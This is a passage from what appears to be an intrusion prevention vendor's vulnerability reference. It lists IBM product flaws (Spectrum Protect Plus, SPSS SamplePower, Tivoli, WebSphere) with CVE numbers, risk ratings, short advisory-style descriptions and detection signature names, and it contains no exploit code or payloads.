Type: Input Validation
Description: There exists a vulnerability in IBM Spectrum Protect Plus, versions 10.1.0-10.1.5, which allows remote attackers to execute arbitrary code by sending a specially crafted request, due to the lack of user input validation of the hostname parameter.
Situation: HTTP_CRL-IBM-Spectrum-Protect-Plus-Hostname-Command-Injection
References:
CVE-2020-4211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4211
Back to top

IBM-Spectrum-Protect-Plus-Timezone-Command-Injection

About this vulnerability: A vulnerability in IBM Spectrum Protect Plus
Risk: High
First detected in: sgpkg-ips-1285-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Spectrum Protect Plus
Type: Input Validation
Description: A command injection vulnerability exists in IBM Spectrum Protect Plus. The vulnerability is due to a lack of input validation in the Administrative Console service when parsing the timezone parameter. A remote authenticated attacker could exploit this vulnerability by sending a specially crafted request to a target system. Successful exploitation could lead to arbitrary code execution in the context of the root user.
Situation: HTTP_CRL-IBM-Spectrum-Protect-Plus-Timezone-Command-Injection
References:
CVE-2020-4206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4206
Back to top

IBM-Spectrum-Protect-Plus-Uploadhttpscertificate-Command-Injection

About this vulnerability: A vulnerability in IBM Spectrum Protect Plus
Risk: Moderate
First detected in: sgpkg-ips-1276-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Spectrum Protect Plus
Type: Input Validation
Description: Improper input validation in the Administrative Console service causes a command injection vulnerability when parsing the filename parameter in the uploadHttpsCertificate method. A successful exploit allows an attacker to execute arbitrary commands with root privileges.
Situation: HTTP_CS-IBM-Spectrum-Protect-Plus-Uploadhttpscertificate-Command-Injection
References:
CVE-2020-4241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4241
Back to top

IBM-SPSS-Samplepower-C1sizer-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in IBM IBM SPSS SamplePower
Risk: Moderate
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM SPSS SamplePower
Type: Buffer Overflow
Description: There is a heap-based buffer overflow vulnerability in IBM SPSS SamplePower. The vulnerability is due to a lack of boundary checking on the user-supplied TabCaption value in the c1sizer ActiveX control. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious website. Successful exploitation could allow arbitrary code execution in the context of the target user.
Situation: File-Text_IBM-SPSS-Samplepower-C1sizer-ActiveX-Control-Buffer-Overflow
References:
CVE-2012-5946
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5946
BID-59559
http://www.securityfocus.com/bid/59559
OSVDB-92845
http://www.osvdb.org/92845
Back to top

IBM-SPSS-Samplepower-Vsflex7l-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in IBM IBM SPSS SamplePower
Risk: Moderate
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM SPSS SamplePower
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in IBM SPSS SamplePower. The vulnerability is due to a lack of boundary checking on the user-supplied ComboList or ColComboList property value in the Vsflex7I ActiveX control. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious website. Successful exploitation could allow arbitrary code execution in the context of the target user.
Situation: File-Text_IBM-SPSS-Samplepower-Vsflex7l-ActiveX-Control-Buffer-Overflow
References:
CVE-2012-5947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5947
BID-59556
http://www.securityfocus.com/bid/59556
OSVDB-92846
http://www.osvdb.org/92846
Back to top

IBM-SPSS-Samplepower-Vsflex8l-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in IBM IBM SPSS SamplePower
Risk: Moderate
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM SPSS SamplePower
Type: Buffer Overflow
Description: There is a global buffer overflow vulnerability in IBM SPSS SamplePower. The vulnerability is due to a lack of boundary checking on the user-supplied ComboList or ColComboList property value in the Vsflex8l ActiveX control. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious website. Successful exploitation could allow arbitrary code execution in the context of the target user.
Situation: File-Text_IBM-SPSS-Samplepower-Vsflex8l-ActiveX-Control-Buffer-Overflow
References:
CVE-2012-5945
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5945
BID-59557
http://www.securityfocus.com/bid/59557
OSVDB-92844
http://www.osvdb.org/92844
Back to top

IBM-SPSS-Samplepower-Vsflex8l.ocx-Combolist-And-Colcombolist-Buffer-Overflow

About this vulnerability: A vulnerability in IBM IBM SPSS SamplePower
Risk: Moderate
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM SPSS SamplePower
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in IBM SPSS SamplePower. The vulnerability is due to a lack of boundary checking on the user-supplied ComboList or ColComboList property value in the Vsflex8I ActiveX control. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious website. Successful exploitation could allow arbitrary code execution in the context of the target user.
Situation: File-Text_IBM-SPSS-Samplepower-Vsflex8l.ocx-Combolist-And-Colcombolist-Buffer-Overflow
References:
CVE-2014-0895
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0895
Back to top

IBM-SPSS-Vsview6.ocx-ActiveX-Control-Code-Execution

About this vulnerability: A vulnerability in IBM IBM SPSS SamplePower
Risk: High
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM SPSS SamplePower
Type: Directory Traversal
Description: A code execution vulnerability exists in the VsVIEW6.ocx ActiveX control, which is shipped as part of IBM SPSS SamplePower. The method SaveDoc() contains a flaw that could lead to injection and execution of arbitrary code. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious website which can result in the execution of arbitrary code within the context of the target user. If code execution is unsuccessful, a denial of service condition may result.
Situation: File-Text_IBM-SPSS-Vsview6.ocx-ActiveX-Control-Code-Execution
References:
CVE-2012-0189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0189
BID-51448
http://www.securityfocus.com/bid/51448
OSVDB-78568
http://www.osvdb.org/78568
Back to top

IBM-System-Director-Agent-DLL-Injection

About this vulnerability: An IBM System Director Agent DLL Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IBM Director Agent
Type: Directory Traversal
Description: A vulnerability in IBM System Director Agent, versions before 5.20.3 Service Update 2, which allows remote attackers to load and execute arbitrary local .dll files via a directory traversal to /CMIListener/ in an M-POST request.
Situation: HTTP_CS-IBM-System-Director-Agent-DLL-Injection
References:
CVE-2009-0880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0880
BID-34065
http://www.securityfocus.com/bid/34065
OSVDB-52616
http://www.osvdb.org/52616
Back to top

IBM-Tivoli-Directory-Server-Ibmslapd.exe-Integer-Overflow

About this vulnerability: A vulnerability in IBM Tivoli Directory Server
Risk: Moderate
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Directory Server
Type: Integer Overflow
Description: There is an integer overflow vulnerability in IBM Tivoli Directory Server (TDS). The vulnerability is due to lack of input validation on LDAP CRAM-MD5 packets sent to the affected service. A crafted packet can trigger a buffer overrun that can be leveraged to inject and execute arbitrary code by the attackers. A remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted LDAP packet to the affected server. Successful exploitation allows the attacker to execute arbitrary code on the server with the privileges of the SYSTEM user.
Situation: LDAP_CS-IBM-Tivoli-Directory-Server-Ibmslapd.exe-Integer-Overflow
References:
CVE-2011-1206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1206
BID-47121
http://www.securityfocus.com/bid/47121
Back to top

IBM-Tivoli-Endpoint-Manager-Web-Reports-Scheduleparam-XSS

About this vulnerability: A vulnerability in IBM Tivoli Endpoint Manager
Risk: High
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Endpoint Manager
Type: Cross-site Scripting
Description: A cross-site scripting (XSS) vulnerability has been reported in the Web Reports component of IBM's Tivoli Endpoint Manager. The vulnerability is due to a lack of sanitization of the ScheduleParam HTTP parameter. A remote, unauthenticated attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt will result in the execution of script code in the security context of a target user's browser, with the possible effect of performing a malicious operation on the vulnerable Web Reports server.
Situation: HTTP_CRL-IBM-Tivoli-Endpoint-Manager-Web-Reports-Scheduleparam-XSS
References:
CVE-2012-0719
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0719
BID-52514
http://www.securityfocus.com/bid/52514
OSVDB-80078
http://www.osvdb.org/80078
Back to top

IBM-Tivoli-Provisioning-Manager-Express-Asset.getMimeType-SQL-Injection

About this vulnerability: A vulnerability in IBM Tivoli Provisioning Manager Express for Software Distribution
Risk: High
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Provisioning Manager Express for Software Distribution
Type: SQL Injection
Description: There is an SQL injection vulnerability in IBM Tivoli Provisioning Manager Express. The vulnerability is due to insufficient input sanitation in the Asset.getMimeType function when processing HTTP requests sent to the getAttachment servlet. A remote attacker can exploit this SQL injection vulnerability to read data from the database including the SHA1 encrypted admin password, and then upload file to the server and execute code under the context of the SYSTEM user.
Situation: HTTP_CRL-IBM-Tivoli-Provisioning-Manager-Express-Asset.getMimeType-SQL-Injection
References:
CVE-2012-0199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0199
OSVDB-79735
http://www.osvdb.org/79735
Back to top

IBM-Tivoli-Provisioning-Manager-Express-Isig.isigctl.1-ActiveX-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Tivoli Provisioning Manager Express for Software Distribution
Risk: Moderate
First detected in: sgpkg-ips-448-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Provisioning Manager Express for Software Distribution
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in IBM Tivoli Provisioning Manager Express for Software Distribution. Specifically, the flaw is in the way the Isig.isigCtl.1 ActiveX Control parses data supplied to the RunAndUploadFile() method. A remote attacker can exploit this vulnerability by enticing a user to visit a malicious web site. Successful exploitation allows arbitrary code execution under the security context of the current user.
Situation: File-Text_IBM-Tivoli-Provisioning-Manager-Express-Isig.isigctl.1-ActiveX-BOF
References:
CVE-2012-0198
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0198
OSVDB-79735
http://www.osvdb.org/79735
Back to top

IBM-Tivoli-Provisioning-Manager-Express-User.updateuservalue-SQL-Injection

About this vulnerability: A vulnerability in IBM Tivoli Provisioning Manager Express for Software Distribution
Risk: High
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Provisioning Manager Express for Software Distribution
Type: SQL Injection
Description: An SQL Injection vulnerability exists in IBM Tivoli Provisioning Manager Express. The vulnerability is due to insufficient input sanitation in the User.updateUserValue function when processing HTTP requests sent to the register.do servlet. A remote attacker can exploit this SQL injection vulnerability to update their Authority level to the ADMIN level, and then upload a file to the server and execute code under the context of the SYSTEM user.
Situation: HTTP_CS-IBM-Tivoli-Provisioning-Manager-Express-User.updateuservalue-SQL-Injection
HTTP_CRL-IBM-Tivoli-Provisioning-Manager-Express-User.updateuservalue-SQL-Injection
References:
CVE-2012-0199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0199
OSVDB-79731
http://www.osvdb.org/79731
Back to top

IBM-Tivoli-Provisioning-Manager-OS-Deployment-Buffer-Overflow

About this vulnerability: IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Buffer Overflow Vulnerabilities
Risk: High
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Provisioning Manager for OS Deployment
Type: Buffer Overflow
Description: IBM Tivoli Provisioning Manager for OS Deployment is prone to multiple stack-based buffer-overflow vulnerabilities because the software fails to properly bounds-check user-supplied input. This allows remote attackers to execute arbitrary code or cause a denial of service.
Situation: HTTP_CSU-IBM-Tivoli-Provisioning-Manager-OS-Deployment-BOF
References:
CVE-2007-1868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1868
BID-23264
http://www.securityfocus.com/bid/23264
Back to top

IBM-Tivoli-Storage-Fastback-Server-Opcode-1335-Format-String-Vulnerability

About this vulnerability: A vulnerability in IBM Tivoli Storage Manager FastBack
Risk: Moderate
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Storage Manager FastBack
Type: Format String
Description: An attacker may gain the ability to run arbitrary code on the system by exploiting a vulnerability in the format string processing.
Situation: Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1335-Format-String-Vulnerability
References:
CVE-2015-1953
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1953
Back to top

IBM-Tivoli-Storage-Manager-Agent-Client-Generic-String-Handling-Buffer-Overflow

About this vulnerability: IBM Tivoli Storage Manager Agent Buffer Overflow
Risk: High
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IBM Tivoli Storage Manager
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in IBM Tivoli Storage Manager Agent Client. The vulnerability is due to a boundary error in a generic string handling function when parsing strings from request packets. This vulnerability can be exploited to cause stack-based buffer overflow. Successful exploitation allows execution of arbitrary code. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process. In an attack case where code injection is not successful, the affected process will terminate abnormally.
Situation: Generic_IBM-Tivoli-Storage-Manager-Agent-Buffer-Overflow
References:
CVE-2008-4828
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4828
BID-34803
http://www.securityfocus.com/bid/34803
OSVDB-54232
http://www.osvdb.org/54232
OSVDB-54231
http://www.osvdb.org/54231
Back to top

IBM-Tivoli-Storage-Manager-Client-CAD-Service-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in IBM Tivoli Storage Manager Client
Risk: High
First detected in: sgpkg-ips-269-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Storage Manager Client; IBM Tivoli Storage Manager Express Client
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in IBM Tivoli Storage Manager Client software. The vulnerability is due to a boundary error in the Client Acceptor Daemon (CAD) service when processing specially-crafted packets. Remote unauthenticated attackers can exploit this vulnerability to inject and execute arbitrary code on the target system. Successful exploitation of this vulnerability allows arbitrary code execution with the SYSTEM privileges of the CAD service.
Situation: Generic_CS-IBM-Tivoli-Storage-Manager-Client-CAD-Service-Buffer-Overflow
References:
CVE-2009-3853
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3853
Back to top

IBM-Tivoli-Storage-Manager-Client-dsmagent.exe-NodeName-Buffer-Overflow

About this vulnerability: IBM Tivoli Storage Manager Client NodeName Buffer Overflow
Risk: High
First detected in: sgpkg-ips-354-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IBM Tivoli Storage Manager
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in IBM Tivoli Storage Manager Client. The vulnerability is due to a boundary error when copying the NodeName from a request packet. This vulnerability can be exploited to cause a stack-based buffer overflow and can allow execution of arbitrary code. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process, which is SYSTEM on Windows platform. In an attack case where code injection is not successful, the affected process will terminate abnormally.
Situation: Generic_IBM-Tivoli-Storage-Manager-Client-Dsmgent-Buffer-Overflow
References:
CVE-2008-4828
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4828
BID-34803
http://www.securityfocus.com/bid/34803
OSVDB-54232
http://www.osvdb.org/54232
OSVDB-54231
http://www.osvdb.org/54231
Back to top

IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption

About this vulnerability: A vulnerability in IBM Tivoli Storage Manager (TSM) Enterprise Server
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Storage Manager Enterprise Server; IBM Tivoli Storage Manager Express Server
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in IBM Tivoli Storage Manager.
Situation: Generic_CS-IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption
References:
CVE-2008-4563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4563
BID-34077
http://www.securityfocus.com/bid/34077
OSVDB-52617
http://www.osvdb.org/52617
Back to top

IBM-Tivoli-Storage-Manager-Fastback-Denial-Of-Service

About this vulnerability: An attempt to exploit a vulnerability in IBM Tivoli Storage Manager FastBack detected
Risk: High
First detected in: sgpkg-ips-1868-5242
Last changed: sgpkg-ips-1868-5242
Platform: Generic
Software: IBM Tivoli Storage Manager FastBack
Type: Malfunction
Description: The server in IBM Tivoli Storage Manager FastBack 5.5.x and 6.x before 6.1.12.2 allows remote attackers to cause a denial of service (service crash) via crafted packets to a TCP port.
Situation: Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Denial-Of-Service-CVE-2015-8523
References:
CVE-2015-8523
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8523
Back to top

IBM-Tivoli-Storage-Manager-Fastback-Mount-Opcode-0x09-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Tivoli Storage Manager FastBack
Risk: High
First detected in: sgpkg-ips-644-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Storage Manager FastBack
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability exists in IBM Tivoli Storage Manager FastBack Mount. The vulnerability is due to insufficient input validation of opcode 0x09 messages before copying user-supplied data into a stack buffer. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to port 30051/TCP. Successful exploitation can result in arbitrary code execution within the security context of the System user.
Situation: Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Mount-Opcode-0x09-Stack-Buffer-Overflow
References:
CVE-2015-0119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0119
Back to top

IBM-Tivoli-Storage-Manager-Fastback-Mount-Service-Code-Execution

About this vulnerability: A vulnerability in IBM Tivoli Storage Manager FastBack
Risk: High
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Storage Manager FastBack
Type: Malfunction
Description: A code execution vulnerability has been reported in IBM Tivoli Storage Manager FastBack. The vulnerability is due to an arbitrary memory accessing in Fastback Mount Service (FastBackMount.exe) which listens by default on UDP port 30005. Remote attackers can exploit this vulnerability by sending multiple requests to this service which leads to corruption of the service memory. Successful exploitation results in code execution with System level privileges.
Situation: Generic_UDP-IBM-Tivoli-Storage-Manager-Fastback-Mount-Service-Code-Execution
Generic_UDP-IBM-Tivoli-Storage-Manager-Fastback-Mount-Service-DoS
References:
CVE-2010-3058
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3058
BID-42549
http://www.securityfocus.com/bid/42549
Back to top

IBM-Tivoli-Storage-Manager-Fastback-Mount-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Tivoli Storage Manager FastBack
Risk: High
First detected in: sgpkg-ips-649-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Storage Manager FastBack
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in IBM Tivoli Storage Manager FastBack Mount. The vulnerability is due to insufficient input validation of parameters to the CRYPTO_S_EncryptBufferToBuffer function. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to port 30051/TCP. Successful exploitation results in arbitrary code execution within the context of SYSTEM.
Situation: Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Mount-Stack-Buffer-Overflow
References:
CVE-2015-0120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0120
BID-74021
http://www.securityfocus.com/bid/74021
Back to top

IBM-Tivoli-Storage-Manager-Fastback-Mount-Vault-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Tivoli Storage Manager FastBack
Risk: High
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Storage Manager FastBack
Type: Malfunction
Description: A stack-based buffer overflow vulnerability exists in IBM Tivoli Storage Manager FastBack Mount. The vulnerability is due to improper bounds checking by the FastBackMount process. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests. Successful exploitation can result in arbitrary code execution within the security context of the System user.
Situation: Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Mount-Vault-Stack-Buffer-Overflow
References:
CVE-2015-1896
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1896
OSVDB-120349
http://www.osvdb.org/120349
Back to top

IBM-Tivoli-Storage-Manager-Fastback-Server-Buffer-Overflow

About this vulnerability: IBM Tivoli Storage Manager Fastback Server Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Storage Manager FastBack
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in IBM Tivoli Storage Manager FastBack Server which allows remote attackers to execute arbitrary code via a crafted command.
Situation: Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Buffer-Overflow
Back to top

IBM-Tivoli-Storage-Manager-Fastback-Server-Buffer-Overflow-CVE-2015-1929

About this vulnerability: A vulnerability in IBM Tivoli Storage Manager FastBack
Risk: High
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: IBM Tivoli Storage Manager FastBack
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in IBM Tivoli Storage Manager FastBack Server. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to port 11460/TCP. Successful exploitation results in arbitrary code execution within the context of System.
Situation: Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Buffer-Overflow-CVE-2015-1929
References:
CVE-2015-1929
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1929
Back to top

IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1301-Format-String-Vuln

About this vulnerability: A vulnerability in IBM Tivoli Storage Manager FastBack
Risk: Moderate
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Storage Manager FastBack
Type: Format String
Description: A crafted message may be used to exploit a format string vulnerability to gain the ability to execute arbitrary code on the target system.
Situation: Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1301-Format-String-Vulnerability
References:
CVE-2015-1986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1986
Back to top

IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1329-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Tivoli Storage Manager FastBack
Risk: High
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Storage Manager FastBack
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in IBM Tivoli Storage Manager FastBack Server. The vulnerability is due to insufficient boundary checking on parameters in opcode 1329 requests. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to port 11460/TCP. Successful exploitation results in arbitrary code execution within the security context of System.
Situation: Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1329-Buffer-Overflow
References:
CVE-2015-1924
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1924
Back to top

IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1329-Directory-Traversal

About this vulnerability: A vulnerability in IBM Tivoli Storage Manager FastBack
Risk: Moderate
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Storage Manager FastBack
Type: Directory Traversal
Description: A directory traversal vulnerability allows an attacker to cause an information disclosure by sending a crafted request to the server.
Situation: Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1329-Directory-Traversal
References:
CVE-2015-1941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1941
Back to top

IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1330-Command-Injection

About this vulnerability: A vulnerability in IBM Tivoli Storage Manager FastBack
Risk: Moderate
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Storage Manager FastBack
Type: Input Validation
Description: Crafted requests can be used to exploit an input validation vulnerability and gain the ability to execute arbitrary commands.
Situation: Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1330-Command-Injection
References:
CVE-2015-1949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1949
Back to top

IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1331-Rmdir-Command-Injection

About this vulnerability: A vulnerability in IBM Tivoli Storage Manager FastBack
Risk: High
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Storage Manager FastBack
Type: Input Validation
Description: A command injection vulnerability exists in IBM Tivoli Storage Manager FastBack Server. The vulnerability is due to insufficient input validation of parameters in opcode 1331 requests. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to port 11460/TCP. Successful exploitation results in arbitrary command execution within the security context of System.
Situation: Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1331-Rmdir-Command-Injection
References:
CVE-2015-1923
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1923
Back to top

IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1332-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Tivoli Storage Manager FastBack
Risk: High
First detected in: sgpkg-ips-695-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Storage Manager FastBack
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in IBM Tivoli Storage Manager FastBack Server. The vulnerability is due to insufficient boundary checking on parameters in opcode 1332 requests. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to port 11460/TCP. Successful exploitation results in arbitrary code execution within the context of System.
Situation: Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1332-Buffer-Overflow
References:
CVE-2015-1925
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1925
Back to top

IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-4115-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Tivoli Storage Manager FastBack
Risk: High
First detected in: sgpkg-ips-726-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Storage Manager FastBack
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in IBM Tivoli Storage Manager FastBack Server. A remote attacker could exploit the system opcode 4115 with crafted requests and execute arbitrary code in the target environment.
Situation: Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-4115-Buffer-Overflow
References:
CVE-2015-4931
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4931
BID-76107
http://www.securityfocus.com/bid/76107
Back to top

IBM-TM1-Planning-Analytics-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in IBM TM1 Planning Analytics detected
Risk: High
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Platform: Generic
Software: IBM TM1
Type: Malfunction
Description: An attempt to exploit a vulnerability in IBM TM1 Planning Analytics detected.
Situation: Generic_TCP-IBM-TM1-Planning-Analytics-Remote-Code-Execution
References:
CVE-2019-4716
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-4716
Back to top

IBM-WebSphere-Application-Server-Authentication-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the authentication process of IBM WebSphere Application Server
Risk: High
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-1589-5242
Platform: Generic
Software: IBM WebSphere Application Server
Type: Buffer Overflow
Description: IBM WebSphere Application Server has a vulnerability in the handling of user-supplied credentials in a form-based authentication. The length of the user-supplied value given either to variable j_username or j_password is not properly checked before the value is copied into a fixed size buffer. A remote attacker is able to cause a buffer overflow condition and possibly execute arbitrary code on the victim server.
Situation: HTTP_CRL-IBM-WebSphere-Application-Server-Authentication-Buffer-Overflow
Back to top

IBM-WebSphere-Application-Server-Remote-Code-Execution

About this vulnerability: A vulnerability in IBM WebSphere Application Server
Risk: High
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM WebSphere Application Server
Type: Malfunction
Description: There exists a remote code execution vulnerability in IBM WebSphere Application Server. A remote attacker can use this to execute arbitrary code in the security context of the System user.
Situation: File-TextId_IBM-WebSphere-Application-Server-Remote-Code-Execution
File-TextId_IBM-WebSphere-Application-Server-Remote-Code-Execution-2
References:
CVE-2015-7450
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7450
Back to top

IBM-WebSphere-Application-Server-SIP-Processing-Denial-Of-Service

About this vulnerability: A vulnerability in IBM WebSphere Application Server
Risk: Moderate
First detected in: sgpkg-ips-796-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM WebSphere Application Server
Type: Input Validation
